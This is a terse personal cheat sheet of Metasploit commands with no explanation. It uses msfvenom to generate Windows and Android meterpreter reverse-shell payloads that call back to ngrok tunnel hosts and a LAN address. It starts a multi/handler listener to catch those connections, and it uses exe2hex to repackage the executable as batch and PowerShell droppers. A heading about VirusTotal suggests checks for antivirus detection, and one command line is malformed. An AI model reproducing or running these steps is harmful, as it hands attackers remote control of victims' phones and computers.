virus total
================
payload
=======

msfvenom -p windows/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=14976 R > ./payload.exe
set payload windows/meterpreter/reverse_tcp
windows/meterpreter/reverse_tcp LHOST=192.168.0.100 LPORT=4444 X > payload.exe


===============================
msfvenom -p android/meterpreter/reverse_tcp LHOST=4.tcp.ngrok.io LPORT=19352 R > ./ngrok.apk


sudo service postgresql start


sudo msfconsole

use exploit/multi/handler

 set payload android/meterpreter/reverse_tcp 

set LHOST localhost

set LPORT 8080

exploit

====================================
exehex
=====================
exe2hex -x payload.exe -b payload.bat -p payload.ps1 -cc -v
exe2hex -x payload.exe -cc
less /root/payload.bat
